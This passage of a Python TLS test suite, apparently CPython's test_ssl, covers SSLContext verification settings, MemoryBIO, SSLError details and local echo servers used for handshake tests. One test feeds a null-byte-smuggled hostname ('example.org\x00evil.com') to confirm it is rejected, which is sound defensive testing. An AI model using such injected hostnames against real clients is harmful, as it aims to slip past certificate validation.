self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.socket() as s:
s.bind(("127.0.0.1", 0))
s.listen()
c = socket.socket()
c.connect(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
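        # Enter the server manually and register __exit__ as cleanup so
        # it stays up for the whole test method.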
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
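        # rc == 0 is also possible when the loopback connect completes
        # immediately.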
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop. Call func(*args); depending on the error we
        # get (WANT_READ or WANT_WRITE), move data between the socket and
        # the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
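            # Note: this local name shadows the errno module for the
            # rest of the loop body.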
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
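        # The positional args above are server_side=False and
        # server_hostname=SIGNED_CERTFILE_HOSTNAME.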
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
        # should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
class ThreadedEchoServer(threading.Thread):
class ConnectionHandler(threading.Thread):
"""A mildly complicated class, because we want it to work both
with and without the SSL wrapper around the socket connection, so
that we can test the STARTTLS functionality."""
def __init__(self, server, connsock, addr):
self.server = server
self.running = False
self.sock = connsock
self.addr = addr
self.sock.setblocking(1)
self.sslconn = None
threading.Thread.__init__(self)
self.daemon = True
def wrap_conn(self):
try:
self.sslconn = self.server.context.wrap_socket(
self.sock, server_side=True)
self.server.selected_npn_protocols.append(self.sslconn.selected_npn_protocol())
self.server.selected_alpn_protocols.append(self.sslconn.selected_alpn_protocol())
except (ConnectionResetError, BrokenPipeError) as e:
# We treat ConnectionResetError as though it were an
# SSLError - OpenSSL on Ubuntu abruptly closes the
# connection when asked to use an unsupported protocol.
#
# BrokenPipeError is raised in TLS 1.3 mode, when OpenSSL
# tries to send session tickets after handshake.
# https://github.com/openssl/openssl/issues/6342
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.close()
return False
except (ssl.SSLError, OSError) as e:
# OSError may occur with wrong protocols, e.g. both
# sides use PROTOCOL_TLS_SERVER.
#
# XXX Various errors can have happened here, for example
# a mismatching protocol version, an invalid certificate,
# or a low-level bug. This should be made more discriminating.
#
# bpo-31323: Store the exception as string to prevent
# a reference leak: server -> conn_errors -> exception
# -> traceback -> self (ConnectionHandler) -> server
self.server.conn_errors.append(str(e))
if self.server.chatty:
handle_error("\n server: bad connection attempt from " + repr(self.addr) + ":\n")
self.running = False
self.server.stop()
self.close()
return False
else:
self.server.shared_ciphers.append(self.sslconn.shared_ciphers())
if self.server.context.verify_mode == ssl.CERT_REQUIRED:
cert = self.sslconn.getpeercert()
if support.verbose and self.server.chatty:
sys.stdout.write(" client cert is " + pprint.pformat(cert) + "\n")
cert_binary = self.sslconn.getpeercert(True)
if support.verbose and self.server.chatty:
sys.stdout.write(" cert binary is " + str(len(cert_binary)) + " bytes\n")
cipher = self.sslconn.cipher()
if support.verbose and self.server.chatty:
sys.stdout.write(" server: connection cipher is now " + str(cipher) + "\n")
sys.stdout.write(" server: selected protocol is now "
+ str(self.sslconn.selected_npn_protocol()) + "\n")
return True
def read(self):
if self.sslconn:
return self.sslconn.read()
else:
return self.sock.recv(1024)
def write(self, bytes):
if self.sslconn:
return self.sslconn.write(bytes)
else:
return self.sock.send(bytes)
def close(self):
if self.sslconn:
self.sslconn.close()
else:
self.sock.close()
def run(self):
self.running = True
if not self.server.starttls_server:
if not self.wrap_conn():
return
while self.running:
try:
msg = self.read()
stripped = msg.strip()
if not stripped:
# eof, so quit this handler
self.running = False
try:
self.sock = self.sslconn.unwrap()
except OSError:
# Many tests shut the TCP connection down
# without an SSL shutdown. This causes
# unwrap() to raise OSError with errno=0!
pass
else:
self.sslconn = None
self.close()
elif stripped == b'over':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: client closed connection\n")
self.close()
return
elif (self.server.starttls_server and
stripped == b'STARTTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read STARTTLS from client, sending OK...\n")
self.write(b"OK\n")
if not self.wrap_conn():
return
elif (self.server.starttls_server and self.sslconn
and stripped == b'ENDTLS'):
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read ENDTLS from client, sending OK...\n")
self.write(b"OK\n")
self.sock = self.sslconn.unwrap()
self.sslconn = None
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: connection is now unencrypted...\n")
elif stripped == b'CB tls-unique':
if support.verbose and self.server.connectionchatty:
sys.stdout.write(" server: read CB tls-unique from client, sending our CB data...\n")
data = self.sslconn.get_channel_binding("tls-unique")
self.write(repr(data).encode("us-ascii") + b"\n")
else:
if (support.verbose and
self.server.connectionchatty):
ctype = (self.sslconn and "encrypted") or "unencrypted"
sys.stdout.write(" server: read %r (%s), sending back %r (%s)...\n"
% (msg, ctype, msg.lower(), ctype))
self.write(msg.lower())
except ConnectionResetError:
# XXX: OpenSSL 1.1.1 sometimes raises ConnectionResetError
# when connection is not shut down gracefully.
if self.server.chatty and support.verbose:
sys.stdout.write(
" Connection reset by peer: {}\n".format(
self.addr)
)
self.close()
self.running = False
except OSError:
if self.server.chatty:
handle_error("Test server failure:\n")
self.close()
self.running = False
# normally, we'd just stop here, but for the test
# harness, we want to stop the server
self.server.stop()
def __init__(self, certificate=None, ssl_version=None,
certreqs=None, cacerts=None,
chatty=True, connectionchatty=False, starttls_server=False,
npn_protocols=None, alpn_protocols=None,
ciphers=None, context=None):
if context:
self.context = context
else:
self.context = ssl.SSLContext(ssl_version
if ssl_version is not None
else ssl.PROTOCOL_TLS_SERVER)
self.context.verify_mode = (certreqs if certreqs is not None
else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
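        # Wait until run() signals that the socket is listening, so the
        # caller can't connect before the server is ready.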
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
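                # join() here serializes connections: this echo server
                # handles one client at a time.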
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
except BaseException as e:
if support.verbose and self.chatty:
sys.stdout.write(
' connection handling failed: ' + repr(e) + '\n')
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
    class EchoServer(asyncore.dispatcher):
class ConnectionHandler(asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
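# Typical use (names as in the tests below):
#     stats = server_params_test(client_context, server_context,
#                                sni_name=hostname)
#     stats['version']  # e.g. 'TLSv1.3', depending on the OpenSSL build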
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
